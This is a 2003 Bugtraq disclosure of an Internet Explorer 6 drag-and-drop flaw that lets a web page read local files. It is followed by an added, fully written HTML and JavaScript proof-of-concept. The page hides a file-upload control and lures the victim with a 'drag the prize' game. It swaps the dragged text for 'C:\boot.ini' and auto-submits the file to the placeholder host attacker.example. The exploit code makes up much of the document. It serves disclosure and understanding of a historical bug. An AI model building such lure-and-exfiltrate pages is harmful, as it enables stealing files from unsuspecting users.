IE - reading local files

From: Adam [ckkl] (ckkl@poczta.wp.pl)
Date: 03/23/03

  • Next message: Piotr Chytla: "3com RAS 1500 Remote vulnerabilities."
    From: "Adam [ckkl]" <ckkl@poczta.wp.pl>
    To: <bugtraq@securityfocus.com>
    Date: Sun, 23 Mar 2003 03:10:25 +0100
    
    

    Hello,

    I don't know if anybody pointed it out before...

    While playing with IE [6.0] I found out that
    it is possible to read local files with a little
    help from the user...

    How does it work?
    1. IE lets you define a style for the INPUT type=file tag,
        including a clipping region, which makes it possible to
        hide the "Browse..." button.

    2. IE lets you handle 3 events
        - ondragstart
        - ondrag
        - ondragend
       for misc tags like DIV, INPUT, IMG and others

    3. IE lets you change the content of the INPUT after
       the user has started to drag it

    Screenplay:
    - user selects text in source INPUT
    - user starts to drag text
    - ondragstart event is fired
    - the function takes control
      and changes the content
      of the source INPUT
    - user drops the text in
      the uploading INPUT control
    - ondragend event is fired
    - the function takes control and
      submits the form at once

    Exploit:
        - create the INPUT upload control (type=file)
        - change its style to make it look innocent
          [remove the border, clip the 'Browse...' button]
        - create the source INPUT control and make it
          look like innocent text [no borders, no focus]
        - write a simple handler for the drag* events
          - it will change the content of the source INPUT
            control to anything we want, e.g. a local filename
        - entice the user (e.g. with some kind of drag&drop
          JavaScript game) to select text and drag it
          into the upload control area, and when
          it's done (ondragend), submit the form and this
          way send the file to the server

    Proof of concept:
    http://www.sztolnia.pl/hack/dragquIEn/dragquIEn.html

    Best Regards
    Adam Blaszczyk
    reverser, coder, writer & researcher [VX/AV]
    http://www.symantec.com (Localization Engineer)
    http://www.mykakee.com (Home page)
    Whatever I say in this e-mail is my private opinion.
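The following page is an added reconstruction of the technique laid out in the message above, written from the description in the post; it is not Adam's own proof-of-concept from sztolnia.pl. It assumes the IE 6-era behaviour the post relies on (a drag source INPUT whose value can be rewritten inside ondragstart, and a type=file control that accepts dropped text as its path); the target path `C:\boot.ini`, the element ids and the collection URL `http://attacker.example/collect` are placeholders chosen here. Current browsers refuse to let script or a text drop set the value of a file input, so the page is only useful for understanding the 2003 attack, not for reproducing it today.

```html
<!-- Added example reconstructed from the post; not the original PoC.
     Relies on IE 6 drag&drop semantics, see the lead-in. -->
<html>
<head>
<style type="text/css">
  /* Step 1: the upload control. No border, transparent, and clipped so that
     only the left 120px of the text box are visible; the "Browse..." button
     sits to the right of the clip rectangle and is never drawn.
     IE 6 clip syntax: rect(top right bottom left), space separated. */
  #upload {
    position: absolute; left: 100px; top: 60px;
    width: 260px; height: 20px;
    border: 0; background: transparent;
    clip: rect(0px 120px 20px 0px);
  }
  /* A harmless-looking "drop box" drawn exactly under the visible part of #upload */
  #box {
    position: absolute; left: 100px; top: 60px;
    width: 120px; height: 20px;
    border: 1px dashed #888;
  }
  /* The drag source: an INPUT that looks like plain text */
  #bait {
    border: 0; background: transparent; font: inherit; width: 60px;
  }
</style>
<script type="text/javascript">
  // Assumption: any local file the victim's account can read.
  var TARGET_FILE = "C:\\boot.ini";

  // Step 2/3: fired on the source INPUT when the user starts dragging the
  // text they selected in it. IE lets us rewrite the INPUT's content during
  // the drag, so the text that eventually lands in the drop target is
  // TARGET_FILE, not the word the user thinks they picked up.
  function onBaitDragStart() {
    var src = document.getElementById("bait");
    src.value = TARGET_FILE;
    src.select();
  }

  // Fired on the source INPUT once the drop has finished. If the drop landed
  // in the file control, its value is now the local path; submit at once so
  // the user has no chance to notice what the box now holds.
  function onBaitDragEnd() {
    var up = document.getElementById("upload");
    if (up.value === TARGET_FILE) {
      document.getElementById("exfil").submit();
    }
  }
</script>
</head>
<body>
  <p>Drag the word <b>prize</b> into the dashed box to win:</p>

  <!-- drag source, dressed up as text; both handlers are on this element -->
  <input type="text" id="bait" value="prize"
         ondragstart="onBaitDragStart()" ondragend="onBaitDragEnd()">

  <div id="box"></div>

  <!-- Assumption: attacker-controlled endpoint receiving the multipart upload -->
  <form id="exfil" method="post" enctype="multipart/form-data"
        action="http://attacker.example/collect">
    <input type="file" name="f" id="upload">
  </form>
</body>
</html>
```

The three properties the post enumerates map directly onto the three pieces above: the `clip` rule hides the Browse button (1), `ondragstart`/`ondragend` on the source INPUT give script control at both ends of the gesture (2), and assigning `src.value` inside `onBaitDragStart` swaps the dragged text for a file path while the drag is in flight (3). The only thing the victim does is drag a word into a box; the form submission itself needs no further click.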

